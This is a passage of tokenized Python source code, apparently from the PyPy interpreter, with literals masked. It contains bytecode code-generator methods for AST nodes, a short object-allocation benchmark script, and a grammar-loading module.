<EOL> names_w [ i ] = space . wrap ( alias . name ) <EOL> self . load_const ( space . newtuple ( names_w ) ) <EOL> if imp . module : <EOL> mod_name = imp . module <EOL> else : <EOL> mod_name = "<STR_LIT>" <EOL> self . emit_op_name ( ops . IMPORT_NAME , self . names , mod_name ) <EOL> if star_import : <EOL> self . emit_op ( ops . IMPORT_STAR ) <EOL> else : <EOL> for alias in imp . names : <EOL> assert isinstance ( alias , ast . alias ) <EOL> self . emit_op_name ( ops . IMPORT_FROM , self . names , alias . name ) <EOL> if alias . asname : <EOL> store_name = alias . asname <EOL> else : <EOL> store_name = alias . name <EOL> self . name_op ( store_name , ast . Store ) <EOL> self . emit_op ( ops . POP_TOP ) <EOL> def visit_Assign ( self , assign ) : <EOL> self . update_position ( assign . lineno , True ) <EOL> if self . _optimize_unpacking ( assign ) : <EOL> return <EOL> assign . value . walkabout ( self ) <EOL> duplications = len ( assign . targets ) - <NUM_LIT:1> <EOL> for i in range ( len ( assign . targets ) ) : <EOL> if i < duplications : <EOL> self . emit_op ( ops . DUP_TOP ) <EOL> assign . targets [ i ] . walkabout ( self ) <EOL> def _optimize_unpacking ( self , assign ) : <EOL> """<STR_LIT>""" <EOL> if len ( assign . targets ) != <NUM_LIT:1> : <EOL> return False <EOL> targets = assign . targets [ <NUM_LIT:0> ] . as_node_list ( self . space ) <EOL> if targets is None : <EOL> return False <EOL> values = assign . value . as_node_list ( self . space ) <EOL> if values is None : <EOL> return False <EOL> targets_count = len ( targets ) <EOL> values_count = len ( values ) <EOL> if targets_count != values_count : <EOL> return False <EOL> for target in targets : <EOL> if not isinstance ( target , ast . Name ) : <EOL> break <EOL> else : <EOL> self . visit_sequence ( values ) <EOL> seen_names = { } <EOL> for i in range ( targets_count - <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> ) : <EOL> target = targets [ i ] <EOL> assert isinstance ( target , ast . Name ) <EOL> if target . id not in seen_names : <EOL> seen_names [ target . id ] = True <EOL> self . name_op ( target . id , ast . Store ) <EOL> else : <EOL> self . emit_op ( ops . POP_TOP ) <EOL> return True <EOL> if values_count > <NUM_LIT:3> : <EOL> return False <EOL> self . visit_sequence ( values ) <EOL> if values_count == <NUM_LIT:2> : <EOL> self . emit_op ( ops . ROT_TWO ) <EOL> elif values_count == <NUM_LIT:3> : <EOL> self . emit_op ( ops . ROT_THREE ) <EOL> self . emit_op ( ops . ROT_TWO ) <EOL> self . visit_sequence ( targets ) <EOL> return True <EOL> def visit_With ( self , wih ) : <EOL> self . update_position ( wih . lineno , True ) <EOL> body_block = self . new_block ( ) <EOL> cleanup = self . new_block ( ) <EOL> exit_storage = self . current_temporary_name ( ) <EOL> temp_result = None <EOL> if wih . optional_vars : <EOL> temp_result = self . current_temporary_name ( ) <EOL> wih . context_expr . walkabout ( self ) <EOL> self . emit_op ( ops . DUP_TOP ) <EOL> self . emit_op_name ( ops . LOAD_ATTR , self . names , "<STR_LIT>" ) <EOL> self . name_op ( exit_storage , ast . Store ) <EOL> self . emit_op_name ( ops . LOAD_ATTR , self . names , "<STR_LIT>" ) <EOL> self . emit_op_arg ( ops . CALL_FUNCTION , <NUM_LIT:0> ) <EOL> if wih . optional_vars : <EOL> self . name_op ( temp_result , ast . Store ) <EOL> else : <EOL> self . emit_op ( ops . POP_TOP ) <EOL> self . emit_jump ( ops . SETUP_FINALLY , cleanup ) <EOL> self . use_next_block ( body_block ) <EOL> self . push_frame_block ( F_BLOCK_FINALLY , body_block ) <EOL> if wih . optional_vars : <EOL> self . name_op ( temp_result , ast . Load ) <EOL> self . name_op ( temp_result , ast . Del ) <EOL> wih . optional_vars . walkabout ( self ) <EOL> self . visit_sequence ( wih . body ) <EOL> self . emit_op ( ops . POP_BLOCK ) <EOL> self . pop_frame_block ( F_BLOCK_FINALLY , body_block ) <EOL> self . load_const ( self . space . w_None ) <EOL> self . use_next_block ( cleanup ) <EOL> self . push_frame_block ( F_BLOCK_FINALLY_END , cleanup ) <EOL> self . name_op ( exit_storage , ast . Load ) <EOL> self . name_op ( exit_storage , ast . Del ) <EOL> self . emit_op ( ops . WITH_CLEANUP ) <EOL> self . emit_op ( ops . END_FINALLY ) <EOL> self . pop_frame_block ( F_BLOCK_FINALLY_END , cleanup ) <EOL> def visit_Raise ( self , rais ) : <EOL> self . update_position ( rais . lineno , True ) <EOL> arg = <NUM_LIT:0> <EOL> if rais . type : <EOL> rais . type . walkabout ( self ) <EOL> arg += <NUM_LIT:1> <EOL> if rais . inst : <EOL> rais . inst . walkabout ( self ) <EOL> arg += <NUM_LIT:1> <EOL> if rais . tback : <EOL> rais . tback . walkabout ( self ) <EOL> arg += <NUM_LIT:1> <EOL> self . emit_op_arg ( ops . RAISE_VARARGS , arg ) <EOL> def visit_Exec ( self , exc ) : <EOL> self . update_position ( exc . lineno , True ) <EOL> exc . body . walkabout ( self ) <EOL> if exc . globals : <EOL> exc . globals . walkabout ( self ) <EOL> if exc . locals : <EOL> exc . locals . walkabout ( self ) <EOL> else : <EOL> self . emit_op ( ops . DUP_TOP ) <EOL> else : <EOL> self . load_const ( self . space . w_None ) <EOL> self . emit_op ( ops . DUP_TOP ) <EOL> self . emit_op ( ops . EXEC_STMT ) <EOL> def visit_Global ( self , glob ) : <EOL> pass <EOL> def visit_Pass ( self , pas ) : <EOL> self . update_position ( pas . lineno , True ) <EOL> def visit_Expr ( self , expr ) : <EOL> self . update_position ( expr . lineno , True ) <EOL> if self . interactive : <EOL> expr . value . walkabout ( self ) <EOL> self . emit_op ( ops . PRINT_EXPR ) <EOL> elif not expr . value . constant : <EOL> expr . value . walkabout ( self ) <EOL> self . emit_op ( ops . POP_TOP ) <EOL> def visit_Yield ( self , yie ) : <EOL> self . update_position ( yie . lineno ) <EOL> if yie . value : <EOL> yie . value . walkabout ( self ) <EOL> else : <EOL> self . load_const ( self . space . w_None ) <EOL> self . emit_op ( ops . YIELD_VALUE ) <EOL> def visit_Num ( self , num ) : <EOL> self . update_position ( num . lineno ) <EOL> self . load_const ( num . n ) <EOL> def visit_Str ( self , string ) : <EOL> self . update_position ( string . lineno ) <EOL> self . load_const ( string . s ) <EOL> def visit_Const ( self , const ) : <EOL> self . update_position ( const . lineno ) <EOL> space = self . space <EOL> value = const . value <EOL> if space . is_true ( space . isinstance ( value , space . w_tuple ) ) : <EOL> length = space . int_w ( space . len ( value ) ) <EOL> key_w = [ None ] * ( length + <NUM_LIT:2> ) <EOL> key_w [ <NUM_LIT:0> ] = value <EOL> for i in range ( <NUM_LIT:1> , length + <NUM_LIT:1> ) : <EOL> key_w [ i ] = space . type ( space . getitem ( value , space . wrap ( i - <NUM_LIT:1> ) ) ) <EOL> key_w [ - <NUM_LIT:1> ] = space . w_tuple <EOL> self . load_const ( value , space . newtuple ( key_w ) ) <EOL> else : <EOL> self . load_const ( value ) <EOL> def visit_UnaryOp ( self , op ) : <EOL> self . update_position ( op . lineno ) <EOL> op . operand . walkabout ( self ) <EOL> self . emit_op ( unary_operations ( op . op ) ) <EOL> def visit_BoolOp ( self , op ) : <EOL> self . update_position ( op . lineno ) <EOL> if op . op == ast . And : <EOL> instr = ops . JUMP_IF_FALSE <EOL> else : <EOL> instr = ops . JUMP_IF_TRUE <EOL> end = self . new_block ( ) <EOL> for value in op . values [ : - <NUM_LIT:1> ] : <EOL> value . walkabout ( self ) <EOL> self . emit_jump ( instr , end ) <EOL> self . emit_op ( ops . POP_TOP ) <EOL> op . values [ - <NUM_LIT:1> ] . walkabout ( self ) <EOL> self . use_next_block ( end ) <EOL> def visit_Compare ( self , comp ) : <EOL> self . update_position ( comp . lineno ) <EOL> comp . left . walkabout ( self ) <EOL> ops_count = len ( comp . ops ) <EOL> cleanup = None <EOL> if ops_count > <NUM_LIT:1> : <EOL> cleanup = self . new_block ( ) <EOL> comp . comparators [ <NUM_LIT:0> ] . walkabout ( self ) <EOL> for i in range ( <NUM_LIT:1> , ops_count ) : <EOL> self . emit_op ( ops . DUP_TOP ) <EOL> self . emit_op ( ops . ROT_THREE ) <EOL> op_kind = compare_operations ( comp . ops [ i - <NUM_LIT:1> ] ) <EOL> self . emit_op_arg ( ops . COMPARE_OP , op_kind ) <EOL> self . emit_jump ( ops . JUMP_IF_FALSE , cleanup ) <EOL> self . emit_op ( ops . POP_TOP ) <EOL> if i < ( ops_count - <NUM_LIT:1> ) : <EOL> comp . comparators [ i ] . walkabout ( self ) <EOL> comp . comparators [ - <NUM_LIT:1> ] . walkabout ( self ) <EOL> last_kind = compare_operations ( comp . ops [ - <NUM_LIT:1> ] ) <EOL> self . emit_op_arg ( ops . COMPARE_OP , last_kind ) <EOL> if ops_count > <NUM_LIT:1> : <EOL> end = self . new_block ( ) <EOL> self . emit_jump ( ops . JUMP_FORWARD , end ) <EOL> self . use_next_block ( cleanup ) <EOL> self . emit_op ( ops . ROT_TWO ) <EOL> self . emit_op ( ops . POP_TOP ) <EOL> self . use_next_block ( end ) <EOL> def visit_IfExp ( self , ifexp ) : <EOL> self . update_position ( ifexp . lineno ) <EOL> end = self . new_block ( ) <EOL> otherwise = self . new_block ( ) <EOL> ifexp . test . accept_jump_if ( self , False , otherwise ) <EOL> self . emit_op ( ops . POP_TOP ) <EOL> ifexp . body . walkabout ( self ) <EOL> self . emit_jump ( ops . JUMP_FORWARD , end ) <EOL> self . use_next_block ( otherwise ) <EOL> self . emit_op ( ops . POP_TOP ) <EOL> ifexp . orelse . walkabout ( self ) <EOL> self . use_next_block ( end ) <EOL> def visit_Tuple ( self , tup ) : <EOL> self . update_position ( tup . lineno ) <EOL> if tup . elts : <EOL> elt_count = len ( tup . elts ) <EOL> else : <EOL> elt_count = <NUM_LIT:0> <EOL> if tup . ctx == ast . Store : <EOL> self . emit_op_arg ( ops . UNPACK_SEQUENCE , elt_count ) <EOL> if elt_count : <EOL> self . visit_sequence ( tup . elts ) <EOL> if tup . ctx == ast . Load : <EOL> self . emit_op_arg ( ops . BUILD_TUPLE , elt_count ) <EOL> def visit_List ( self , l ) : <EOL> self . update_position ( l . lineno ) <EOL> if l . elts : <EOL> elt_count = len ( l . elts ) <EOL> else : <EOL> elt_count = <NUM_LIT:0> <EOL> if l . ctx == ast . Store : <EOL> self . emit_op_arg ( ops . UNPACK_SEQUENCE , elt_count ) <EOL> if elt_count : <EOL> self . visit_sequence ( l . elts ) <EOL> if l . ctx == ast . Load : <EOL> self . emit_op_arg ( ops . BUILD_LIST , elt_count ) <EOL> def visit_Dict ( self , d ) : <EOL> self . update_position ( d . lineno ) <EOL> self . emit_op_arg ( ops . BUILD_MAP , <NUM_LIT:0> ) <EOL> if d . values : <EOL> for i in range ( len ( d . values ) ) : <EOL> self . emit_op ( ops . DUP_TOP ) <EOL> d . values [ i ] . walkabout ( self ) <EOL> self . emit_op ( ops . ROT_TWO ) <EOL> d . keys [ i ] . walkabout ( self ) <EOL> self . emit_op ( ops . STORE_SUBSCR ) <EOL> def visit_Name ( self , name ) : <EOL> self . update_position ( name . lineno ) <EOL> self . name_op ( name . id , name . ctx ) <EOL> def visit_keyword ( self , keyword ) : <EOL> self . load_const ( self . space . wrap ( keyword . arg ) ) <EOL> keyword . value . walkabout ( self ) <EOL> def visit_Call ( self , call ) : <EOL> self . update_position ( call . lineno ) <EOL> if self . _optimize_builtin_call ( call ) or self . _optimize_method_call ( call ) : <EOL> return <EOL> call . func . walkabout ( self ) <EOL> arg = <NUM_LIT:0> <EOL> call_type = <NUM_LIT:0> <EOL> if call . args : <EOL> arg = len ( call . args ) <EOL> self . visit_sequence ( call . args ) <EOL> if call . keywords : <EOL> self . visit_sequence ( call . keywords ) <EOL> arg |= len ( call . keywords ) << <NUM_LIT:8> <EOL> if call . starargs : <EOL> call . starargs . walkabout ( self ) <EOL> call_type |= <NUM_LIT:1> <EOL> if call . kwargs : <EOL> call . kwargs . walkabout ( self ) <EOL> call_type |= <NUM_LIT:2> <EOL> op = <NUM_LIT:0> <EOL> if call_type == <NUM_LIT:0> : <EOL> op = ops . CALL_FUNCTION <EOL> elif call_type == <NUM_LIT:1> : <EOL> op = ops . CALL_FUNCTION_VAR <EOL> elif call_type == <NUM_LIT:2> : <EOL> op = ops . CALL_FUNCTION_KW <EOL> elif call_type == <NUM_LIT:3> : <EOL> op = ops . CALL_FUNCTION_VAR_KW <EOL> self . emit_op_arg ( op , arg ) <EOL> def _call_has_simple_args ( self , call ) : <EOL> return not call . starargs and not call . kwargs and not call . keywords <EOL> def _optimize_builtin_call ( self , call ) : <EOL> if not self . space . config . objspace . opcodes . CALL_LIKELY_BUILTIN or not self . _call_has_simple_args ( call ) or not isinstance ( call . func , ast . Name ) : <EOL> return False <EOL> func_name = call . func <EOL> assert isinstance ( func_name , ast . Name ) <EOL> name_scope = self . scope . lookup ( func_name . id ) <EOL> if name_scope == symtable . SCOPE_GLOBAL_IMPLICIT or name_scope == symtable . SCOPE_UNKNOWN : <EOL> builtin_index = BUILTIN_TO_INDEX . get ( func_name . id , - <NUM_LIT:1> ) <EOL> if builtin_index != - <NUM_LIT:1> : <EOL> if call . args : <EOL> args_count = len ( call . args ) <EOL> self . visit_sequence ( call . args ) <EOL> else : <EOL> args_count = <NUM_LIT:0> <EOL> arg = builtin_index << <NUM_LIT:8> | args_count <EOL> self . emit_op_arg ( ops . CALL_LIKELY_BUILTIN , arg ) <EOL> return True <EOL> return False <EOL> def _optimize_method_call ( self , call ) : <EOL> if not self . space . config . objspace . opcodes . CALL_METHOD or not self . _call_has_simple_args ( call ) or not isinstance ( call . func , ast . Attribute ) : <EOL> return False <EOL> attr_lookup = call . func <EOL> assert isinstance ( attr_lookup , ast . Attribute ) <EOL> attr_lookup . value . walkabout ( self ) <EOL> self . emit_op_name ( ops . LOOKUP_METHOD , self . names , attr_lookup . attr ) <EOL> if call . args : <EOL> self . visit_sequence ( call . args ) <EOL> arg_count = len ( call . args ) <EOL> else : <EOL> arg_count = <NUM_LIT:0> <EOL> self . emit_op_arg ( ops . CALL_METHOD , arg_count ) <EOL> return True <EOL> def _listcomp_generator ( self , list_name , gens , gen_index , elt ) : <EOL> start = self . new_block ( ) <EOL> skip = self . new_block ( ) <EOL> if_cleanup = self . new_block ( ) <EOL> anchor = self . new_block ( ) <EOL> gen = gens [ gen_index ] <EOL> assert isinstance ( gen , ast . comprehension ) <EOL> gen . iter . walkabout ( self ) <EOL> self . emit_op ( ops . GET_ITER ) <EOL> self . use_next_block ( start ) <EOL> self . emit_jump ( ops . FOR_ITER , anchor ) <EOL> self . use_next_block ( ) <EOL> gen . target . walkabout ( self ) <EOL> if gen . ifs : <EOL> if_count = len ( gen . ifs ) <EOL> for if_ in gen . ifs : <EOL> if_ . accept_jump_if ( self , False , if_cleanup ) <EOL> self . use_next_block ( ) <EOL> self . emit_op ( ops . POP_TOP ) <EOL> else : <EOL> if_count = <NUM_LIT:0> <EOL> gen_index += <NUM_LIT:1> <EOL> if gen_index < len ( gens ) : <EOL> self . _listcomp_generator ( list_name , gens , gen_index , elt ) <EOL> else : <EOL> self . name_op ( list_name , ast . Load ) <EOL> elt . walkabout ( self ) <EOL> self . emit_op ( ops . LIST_APPEND ) <EOL> self . use_next_block ( skip ) <EOL> for i in range ( if_count ) : <EOL> self . emit_op_arg ( ops . JUMP_FORWARD , <NUM_LIT:1> ) <EOL> if i == <NUM_LIT:0> : <EOL> self . use_next_block ( if_cleanup ) <EOL> self . emit_op ( ops . POP_TOP ) <EOL> self . emit_jump ( ops . JUMP_ABSOLUTE , start , True ) <EOL> self . use_next_block ( anchor ) <EOL> if gen_index == <NUM_LIT:1> : <EOL> self . name_op ( list_name , ast . Del ) <EOL> def visit_ListComp ( self , lc ) : <EOL> self . update_position ( lc . lineno ) <EOL> tmp_name = self . current_temporary_name ( ) <EOL> self . emit_op_arg ( ops . BUILD_LIST , <NUM_LIT:0> ) <EOL> self . emit_op ( ops . DUP_TOP ) <EOL> self . name_op ( tmp_name , ast . Store ) <EOL> self . _listcomp_generator ( tmp_name , lc . generators , <NUM_LIT:0> , lc . elt ) <EOL> def _genexp_generator ( self , generators , gen_index , elt ) : <EOL> start = self . new_block ( ) <EOL> skip = self . new_block ( ) <EOL> if_cleanup = self . new_block ( ) <EOL> anchor = self . new_block ( ) <EOL> end = self . new_block ( ) <EOL> gen = generators [ gen_index ] <EOL> assert isinstance ( gen , ast . comprehension ) <EOL> self . emit_jump ( ops . SETUP_LOOP , end ) <EOL> self . push_frame_block ( F_BLOCK_LOOP , start ) <EOL> if gen_index == <NUM_LIT:0> : <EOL> self . argcount = <NUM_LIT:1> <EOL> self . name_op ( "<STR_LIT>" , ast . Load ) <EOL> else : <EOL> gen . iter . walkabout ( self ) <EOL> self . emit_op ( ops . GET_ITER ) <EOL> self . use_next_block ( start ) <EOL> self . emit_jump ( ops . FOR_ITER , anchor ) <EOL> self . use_next_block ( ) <EOL> gen . target . walkabout ( self ) <EOL> if gen . ifs : <EOL> ifs_count = len ( gen . ifs ) <EOL> for if_ in gen . ifs : <EOL> if_ . accept_jump_if ( self , False , if_cleanup ) <EOL> self . use_next_block ( ) <EOL> self . emit_op ( ops . POP_TOP ) <EOL> else : <EOL> ifs_count = <NUM_LIT:0> <EOL> gen_index += <NUM_LIT:1> <EOL> if gen_index < len ( generators ) : <EOL> self . _genexp_generator ( generators , gen_index , elt ) <EOL> else : <EOL> elt . walkabout ( self ) <EOL> self . emit_op ( ops . YIELD_VALUE ) <EOL> self . emit_op ( ops . POP_TOP ) <EOL> self . use_next_block ( skip ) <EOL> for i in range ( ifs_count ) : <EOL> self . emit_op_arg ( ops . JUMP_FORWARD , <NUM_LIT:1> ) <EOL> if i == <NUM_LIT:0> : <EOL> self . use_next_block ( if_cleanup ) <EOL> self . emit_op ( ops . POP_TOP ) <EOL> self . emit_jump ( ops . JUMP_ABSOLUTE , start , True ) <EOL> self . use_next_block ( anchor ) <EOL> self . emit_op ( ops . POP_BLOCK ) <EOL> self . pop_frame_block ( F_BLOCK_LOOP , start ) <EOL> self . use_next_block ( end ) <EOL> def visit_GeneratorExp ( self , genexp ) : <EOL> code = self . sub_scope ( GenExpCodeGenerator , "<STR_LIT>" , genexp , <EOL> genexp . lineno ) <EOL> self . update_position ( genexp . lineno ) <EOL> self . _make_function ( code ) <EOL> first_comp = genexp . generators [ <NUM_LIT:0> ] <EOL> assert isinstance ( first_comp , ast . comprehension ) <EOL> first_comp . iter . walkabout ( self ) <EOL> self . emit_op ( ops . GET_ITER ) <EOL> self . emit_op_arg ( ops . CALL_FUNCTION , <NUM_LIT:1> ) <EOL> def visit_Repr ( self , rep ) : <EOL> self . update_position ( rep . lineno ) <EOL> rep . value . walkabout ( self ) <EOL> self . emit_op ( ops . UNARY_CONVERT ) <EOL> def visit_Attribute ( self , attr ) : <EOL> self . update_position ( attr . lineno ) <EOL> names = self . names <EOL> ctx = attr . ctx <EOL> if ctx != ast . AugStore : <EOL> attr . value . walkabout ( self ) <EOL> if ctx == ast . AugLoad : <EOL> self . emit_op ( ops . DUP_TOP ) <EOL> self . emit_op_name ( ops . LOAD_ATTR , names , attr . attr ) <EOL> elif ctx == ast . Load : <EOL> self . emit_op_name ( ops . LOAD_ATTR , names , attr . attr ) <EOL> elif ctx == ast . AugStore : <EOL> self . emit_op ( ops . ROT_TWO ) <EOL> self . emit_op_name ( ops . STORE_ATTR , names , attr . attr ) <EOL> elif ctx == ast . Store : <EOL> self . emit_op_name ( ops . STORE_ATTR , names , attr . attr ) <EOL> elif ctx == ast . Del : <EOL> self . emit_op_name ( ops . DELETE_ATTR , names , attr . attr ) <EOL> else : <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> def _simple_slice ( self , slc , ctx ) : <EOL> slice_offset = <NUM_LIT:0> <EOL> stack_count = <NUM_LIT:0> <EOL> if slc . lower : <EOL> slice_offset += <NUM_LIT:1> <EOL> stack_count += <NUM_LIT:1> <EOL> if ctx != ast . AugStore : <EOL> slc . lower . walkabout ( self ) <EOL> if slc . upper : <EOL> slice_offset += <NUM_LIT:2> <EOL> stack_count += <NUM_LIT:1> <EOL> if ctx != ast . AugStore : <EOL> slc . upper . walkabout ( self ) <EOL> if ctx == ast . AugLoad : <EOL> if stack_count == <NUM_LIT:0> : <EOL> self . emit_op ( ops . DUP_TOP ) <EOL> elif stack_count == <NUM_LIT:1> : <EOL> self . emit_op_arg ( ops . DUP_TOPX , <NUM_LIT:2> ) <EOL> elif stack_count == <NUM_LIT:2> : <EOL> self . emit_op_arg ( ops . DUP_TOPX , <NUM_LIT:3> ) <EOL> elif ctx == ast . AugStore : <EOL> if stack_count == <NUM_LIT:0> : <EOL> self . emit_op ( ops . ROT_TWO ) <EOL> elif stack_count == <NUM_LIT:1> : <EOL> self . emit_op ( ops . ROT_THREE ) <EOL> elif stack_count == <NUM_LIT:2> : <EOL> self . emit_op ( ops . ROT_FOUR ) <EOL> self . emit_op ( slice_operations ( ctx ) + slice_offset ) <EOL> def _complex_slice ( self , slc , ctx ) : <EOL> if slc . lower : <EOL> slc . lower . walkabout ( self ) <EOL> else : <EOL> self . load_const ( self . space . w_None ) <EOL> if slc . upper : <EOL> slc . upper . walkabout ( self ) <EOL> else : <EOL> self . load_const ( self . space . w_None ) <EOL> arg = <NUM_LIT:2> <EOL> if slc . step : <EOL> slc . step . walkabout ( self ) <EOL> arg += <NUM_LIT:1> <EOL> self . emit_op_arg ( ops . BUILD_SLICE , arg ) <EOL> def _nested_slice ( self , slc , ctx ) : <EOL> if isinstance ( slc , ast . Ellipsis ) : <EOL> self . load_const ( self . space . w_Ellipsis ) <EOL> elif isinstance ( slc , ast . Slice ) : <EOL> self . _complex_slice ( slc , ctx ) <EOL> elif isinstance ( slc , ast . Index ) : <EOL> slc . value . walkabout ( self ) <EOL> else : <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> def _compile_slice ( self , slc , ctx ) : <EOL> if isinstance ( slc , ast . Index ) : <EOL> kind = "<STR_LIT:index>" <EOL> if ctx != ast . AugStore : <EOL> slc . value . walkabout ( self ) <EOL> elif isinstance ( slc , ast . Ellipsis ) : <EOL> kind = "<STR_LIT>" <EOL> if ctx != ast . AugStore : <EOL> self . load_const ( self . space . w_Ellipsis ) <EOL> elif isinstance ( slc , ast . Slice ) : <EOL> kind = "<STR_LIT>" <EOL> if not slc . step : <EOL> self . _simple_slice ( slc , ctx ) <EOL> return <EOL> elif ctx != ast . AugStore : <EOL> self . _complex_slice ( slc , ctx ) <EOL> elif isinstance ( slc , ast . ExtSlice ) : <EOL> kind = "<STR_LIT>" <EOL> if ctx != ast . AugStore : <EOL> for dim in slc . dims : <EOL> self . _nested_slice ( dim , ctx ) <EOL> self . emit_op_arg ( ops . BUILD_TUPLE , len ( slc . dims ) ) <EOL> else : <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> if ctx == ast . AugLoad : <EOL> self . emit_op_arg ( ops . DUP_TOPX , <NUM_LIT:2> ) <EOL> elif ctx == ast . AugStore : <EOL> self . emit_op ( ops . ROT_THREE ) <EOL> self . emit_op ( subscr_operations ( ctx ) ) <EOL> def visit_Subscript ( self , sub ) : <EOL> self . update_position ( sub . lineno ) <EOL> if sub . ctx != ast . AugStore : <EOL> sub . value . walkabout ( self ) <EOL> self . _compile_slice ( sub . slice , sub . ctx ) <EOL> class TopLevelCodeGenerator ( PythonCodeGenerator ) : <EOL> def __init__ ( self , space , tree , symbols , compile_info ) : <EOL> PythonCodeGenerator . __init__ ( self , space , "<STR_LIT>" , tree , - <NUM_LIT:1> , <EOL> symbols , compile_info ) <EOL> def _compile ( self , tree ) : <EOL> tree . walkabout ( self ) <EOL> def _get_code_flags ( self ) : <EOL> return <NUM_LIT:0> <EOL> class AbstractFunctionCodeGenerator ( PythonCodeGenerator ) : <EOL> def _handle_nested_args ( self , args ) : <EOL> for i in range ( len ( args ) ) : <EOL> arg = args [ i ] <EOL> if isinstance ( arg , ast . Tuple ) : <EOL> self . update_position ( arg . lineno ) <EOL> self . name_op ( "<STR_LIT>" % ( i , ) , ast . Load ) <EOL> arg . walkabout ( self ) <EOL> def _get_code_flags ( self ) : <EOL> scope = self . scope <EOL> assert isinstance ( scope , symtable . FunctionScope ) <EOL> flags = <NUM_LIT:0> <EOL> if scope . locals_fully_known : <EOL> flags |= consts . CO_OPTIMIZED <EOL> if scope . nested : <EOL> flags |= consts . CO_NESTED <EOL> if scope . is_generator : <EOL> flags |= consts . CO_GENERATOR <EOL> if scope . has_variable_arg : <EOL> flags |= consts . CO_VARARGS <EOL> if scope . has_keywords_arg : <EOL> flags |= consts . CO_VARKEYWORDS <EOL> if not self . cell_vars and not self . free_vars : <EOL> flags |= consts . CO_NOFREE <EOL> return PythonCodeGenerator . _get_code_flags ( self ) | flags <EOL> class FunctionCodeGenerator ( AbstractFunctionCodeGenerator ) : <EOL> def _compile ( self , func ) : <EOL> assert isinstance ( func , ast . FunctionDef ) <EOL> if self . is_docstring ( func . body [ <NUM_LIT:0> ] ) : <EOL> doc_expr = func . body [ <NUM_LIT:0> ] <EOL> assert isinstance ( doc_expr , ast . Expr ) <EOL> doc_str = doc_expr . value <EOL> assert isinstance ( doc_str , ast . Str ) <EOL> self . add_const ( doc_str . s ) <EOL> start = <NUM_LIT:1> <EOL> else : <EOL> self . add_const ( self . space . w_None ) <EOL> start = <NUM_LIT:0> <EOL> if func . args . args : <EOL> self . _handle_nested_args ( func . args . args ) <EOL> self . argcount = len ( func . args . args ) <EOL> for i in range ( start , len ( func . body ) ) : <EOL> func . body [ i ] . walkabout ( self ) <EOL> class LambdaCodeGenerator ( AbstractFunctionCodeGenerator ) : <EOL> def _compile ( self , lam ) : <EOL> assert isinstance ( lam , ast . Lambda ) <EOL> if lam . args . args : <EOL> self . _handle_nested_args ( lam . args . args ) <EOL> self . argcount = len ( lam . args . args ) <EOL> lam . body . walkabout ( self ) <EOL> self . emit_op ( ops . RETURN_VALUE ) <EOL> class GenExpCodeGenerator ( AbstractFunctionCodeGenerator ) : <EOL> def _compile ( self , genexp ) : <EOL> assert isinstance ( genexp , ast . GeneratorExp ) <EOL> self . update_position ( genexp . lineno ) <EOL> self . _genexp_generator ( genexp . generators , <NUM_LIT:0> , genexp . elt ) <EOL> def _get_code_flags ( self ) : <EOL> flags = AbstractFunctionCodeGenerator . _get_code_flags ( self ) <EOL> return flags | consts . CO_GENERATOR <EOL> class ClassCodeGenerator ( PythonCodeGenerator ) : <EOL> def _compile ( self , cls ) : <EOL> assert isinstance ( cls , ast . ClassDef ) <EOL> self . lineno = self . first_lineno <EOL> self . name_op ( "<STR_LIT>" , ast . Load ) <EOL> self . name_op ( "<STR_LIT>" , ast . Store ) <EOL> self . _handle_body ( cls . body ) <EOL> self . emit_op ( ops . LOAD_LOCALS ) <EOL> self . emit_op ( ops . RETURN_VALUE ) </s>
<s> from sup import run <EOL> def w ( N , start ) : <EOL> class A ( object ) : <EOL> def __init__ ( self ) : <EOL> pass <EOL> class B ( object ) : <EOL> def __init__ ( self , x , y ) : <EOL> pass <EOL> start ( ) <EOL> i = <NUM_LIT:0> <EOL> while i < N : <EOL> A ( ) <EOL> A ( ) <EOL> A ( ) <EOL> A ( ) <EOL> A ( ) <EOL> B ( <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> B ( <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> B ( <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> B ( <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> i += <NUM_LIT:1> <EOL> run ( w , <NUM_LIT:1000> ) </s>
<s> import os <EOL> from pypy . interpreter . pyparser import parser , pytoken , metaparser <EOL> class PythonGrammar ( parser . Grammar ) : <EOL> KEYWORD_TOKEN = pytoken . python_tokens [ "<STR_LIT>" ] <EOL> TOKENS = pytoken . python_tokens <EOL> OPERATOR_MAP = pytoken . python_opmap <EOL> def _get_python_grammar ( ) : <EOL> here = os . path . dirname ( __file__ ) <EOL> fp = open ( os . path . join ( here , "<STR_LIT:data>" , "<STR_LIT>" ) ) <EOL> try : <EOL> gram_source = fp . read ( ) <EOL> finally : <EOL> fp . close ( ) <EOL> pgen = metaparser . ParserGenerator ( gram_source ) <EOL> return pgen . build_grammar ( PythonGrammar ) <EOL> python_grammar = _get_python_grammar ( ) <EOL> python_grammar_no_with_statement = python_grammar . shared_copy ( ) <EOL> python_grammar_no_with_statement . keyword_ids = python_grammar_no_with_statement . keyword_ids . copy ( ) <EOL> del python_grammar_no_with_statement . keyword_ids [ "<STR_LIT>" ] <EOL> del python_grammar_no_with_statement . keyword_ids [ "<STR_LIT>" ] <EOL> class _Tokens ( object ) : <EOL> pass <EOL> for tok_name , idx in pytoken . python_tokens . iteritems ( ) : <EOL> setattr ( _Tokens , tok_name , idx ) <EOL> tokens = _Tokens ( ) <EOL> class _Symbols ( object ) : <EOL> pass <EOL> for sym_name , idx in python_grammar . symbol_ids . iteritems ( ) : <EOL> setattr ( _Symbols , sym_name , idx ) <EOL> syms = _Symbols ( ) <EOL> del _get_python_grammar , _Tokens , tok_name , sym_name , idx </s>
